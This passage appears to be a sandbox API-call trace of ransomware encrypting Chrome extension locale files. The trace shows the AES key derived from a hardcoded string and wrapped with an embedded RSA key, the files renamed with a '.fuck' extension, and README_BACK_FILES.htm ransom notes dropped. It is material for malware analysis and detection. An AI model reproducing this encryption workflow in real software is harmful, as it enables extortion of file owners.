(hFile=0x5d50) returned 0x1 [0247.776] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0247.780] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0247.780] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29385f8 [0247.780] FindNextFileA (in: hFindFile=0x29385f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.780] FindNextFileA (in: hFindFile=0x29385f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.781] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0247.781] GetLastError () returned 0x0 [0247.781] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json")) returned 0x20 [0247.781] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json", dwFileAttributes=0x80) returned 1 [0247.782] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0247.782] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0247.785] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0247.786] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293ab70) returned 1 [0247.790] CryptCreateHash (in: hProv=0x293ab70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0247.790] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0247.790] CryptHashData (hHash=0x29387f8, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.790] CryptDeriveKey (in: hProv=0x293ab70, Algid=0x6610, hBaseData=0x29387f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29389f8) returned 1 [0247.790] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.790] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0247.790] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293ad08) returned 1 [0247.791] CryptImportPublicKeyInfo (in: hCryptProv=0x293ad08, dwCertEncodingType=0x1, pInfo=0x292fbb0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292fbe0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292fbe8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2938a38) returned 1 [0247.791] CryptEncrypt (in: hKey=0x2938a38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0247.791] CryptEncrypt (in: hKey=0x2938a38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293ac80*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293ac80*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0247.791] WriteFile (in: hFile=0x5d58, lpBuffer=0x293ac80*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293ac80*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0247.792] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0247.794] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0247.794] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0247.794] CloseHandle (hObject=0x5d5c) returned 1 [0247.794] CloseHandle (hObject=0x5d58) returned 1 [0247.803] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json"), bFailIfExists=0) returned 1 [0247.808] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json", dwFileAttributes=0x0) returned 1 [0247.809] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.gsg")) returned 1 [0247.810] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.fuck")) returned 1 [0247.811] CryptDestroyHash (hHash=0x29387f8) returned 1 [0247.811] CryptDestroyKey (hKey=0x29389f8) returned 1 [0247.811] CryptReleaseContext (hProv=0x293ab70, dwFlags=0x0) returned 1 [0247.812] FindNextFileA (in: hFindFile=0x29385f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0247.812] FindClose (in: hFindFile=0x29385f8 | out: hFindFile=0x29385f8) returned 1 [0247.812] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\readme_back_files.htm")) returned 0xffffffff [0247.812] AreFileApisANSI () returned 1 [0247.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0247.812] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0247.813] GetFileType (hFile=0x5d50) returned 0x1 [0247.813] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0247.814] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0247.814] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0247.815] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.815] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.816] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0247.816] GetLastError () returned 0x0 [0247.816] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json")) returned 0x20 [0247.816] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json", dwFileAttributes=0x80) returned 1 [0247.817] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0247.817] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0247.817] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0247.818] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293ab70) returned 1 [0247.821] CryptCreateHash (in: hProv=0x293ab70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0247.821] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0247.821] CryptHashData (hHash=0x29385f8, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.821] CryptDeriveKey (in: hProv=0x293ab70, Algid=0x6610, hBaseData=0x29385f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29389f8) returned 1 [0247.821] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.821] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0247.821] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2939c90) returned 1 [0247.822] CryptImportPublicKeyInfo (in: hCryptProv=0x2939c90, dwCertEncodingType=0x1, pInfo=0x292eeb0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292eee0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292eee8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2938ab8) returned 1 [0247.822] CryptEncrypt (in: hKey=0x2938ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0247.822] CryptEncrypt (in: hKey=0x2938ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293a378*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293a378*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0247.822] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293a378*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293a378*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0247.824] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0247.825] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0247.825] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0247.825] CloseHandle (hObject=0x5d58) returned 1 [0247.825] CloseHandle (hObject=0x5d5c) returned 1 [0247.826] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json"), bFailIfExists=0) returned 1 [0247.830] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json", dwFileAttributes=0x0) returned 1 [0247.831] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.gsg")) returned 1 [0247.832] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.fuck")) returned 1 [0247.833] CryptDestroyHash (hHash=0x29385f8) returned 1 [0247.833] CryptDestroyKey (hKey=0x29389f8) returned 1 [0247.833] CryptReleaseContext (hProv=0x293ab70, dwFlags=0x0) returned 1 [0247.834] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0247.834] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0247.834] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\readme_back_files.htm")) returned 0xffffffff [0247.834] AreFileApisANSI () returned 1 [0247.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3310, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0247.834] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0247.835] GetFileType (hFile=0x5d50) returned 0x1 [0247.835] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0247.836] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0247.836] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938af8 [0247.836] FindNextFileA (in: hFindFile=0x2938af8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.837] FindNextFileA (in: hFindFile=0x2938af8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.837] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0247.837] GetLastError () returned 0x0 [0247.837] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json")) returned 0x20 [0247.837] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json", dwFileAttributes=0x80) returned 1 [0247.837] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0247.838] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0247.839] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0247.840] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293a400) returned 1 [0247.843] CryptCreateHash (in: hProv=0x293a400, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0247.843] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0247.843] CryptHashData (hHash=0x2938978, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.843] CryptDeriveKey (in: hProv=0x293a400, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29389f8) returned 1 [0247.843] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 